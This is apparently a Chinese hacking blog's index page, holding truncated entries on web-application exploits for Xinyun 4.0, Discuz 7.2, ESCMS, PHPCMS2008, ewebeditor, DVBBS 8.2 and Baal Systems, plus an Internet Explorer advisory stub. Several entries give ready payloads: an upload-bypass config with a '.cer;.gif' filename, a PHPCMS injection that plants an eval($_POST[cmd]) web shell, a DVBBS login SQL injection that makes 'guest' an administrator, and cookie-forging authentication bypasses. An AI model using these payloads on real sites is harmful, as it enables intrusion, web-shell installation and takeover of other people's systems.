新云4.0注册上传漏洞(最新漏洞0day)

影响版本:新云4.0最新

漏洞描述:

把下面配置文件保存为(xunyun.seraph)


url=http://localhost/users/upload.asp?action=save&ChannelID=1&sType=

filefield=File1

filefield2=

filename=200981623554.cer;.gif

filename2=

...

标签:

Discuz! v7.2 注入漏洞分析与利用(图)

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
...

标签:

ESCMS cookies欺骗漏洞

影响版本:
ESCMS V1.0 SP1 Build 1125漏洞描述:
<%
if Request.cookies(CookiesKey)("ES_admin")="" then
''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
''CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2
...

标签:

快客电邮

快客电邮
...

标签:

ESCMS cookies欺骗0day

版本:ESCMS V1.0 SP1 Build 1125
后台登陆验证是通过admin/check.asp实现的,看代码


<%
if Request.cookies(CookiesKey)("ES_admin")="" then 
''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
...

标签:

IE 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability

Bugtraq ID: 38463
Class: Boundary Condition Error
CVE: CVE-2010-0483

Remote: Yes
Local: No
Published: Feb 26 2010 12:00AM
Updated: Mar 01 2010 11:02PM
Credit: Maurycy Prodeus
Vulnerable: Microsoft Internet Explorer 7.0.5730 .11
...

标签:

PHPCMS2008利用EXP

guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}

phpinfo替换成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
...

标签:

ewebeditor for php任意文件上传漏洞

此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:

<?php

$sUsername = "admin";
$sPassword = "admin";

$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";

...

标签:

DVBBS 8.2 漏洞利用

在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。现在我们已经是前台管理员了。那么怎样才能让

标签:

Baal Systems <= 3.8 (Auth Bypass) 后台万能登入漏洞

漏洞文件:adminlogin.php

代码: <?php 


include("common.php"); 
if (!empty($_POST['password'])) { 
    $username = $_POST['username']; 
    $password = $_POST['password']; 
...

分页:«12345»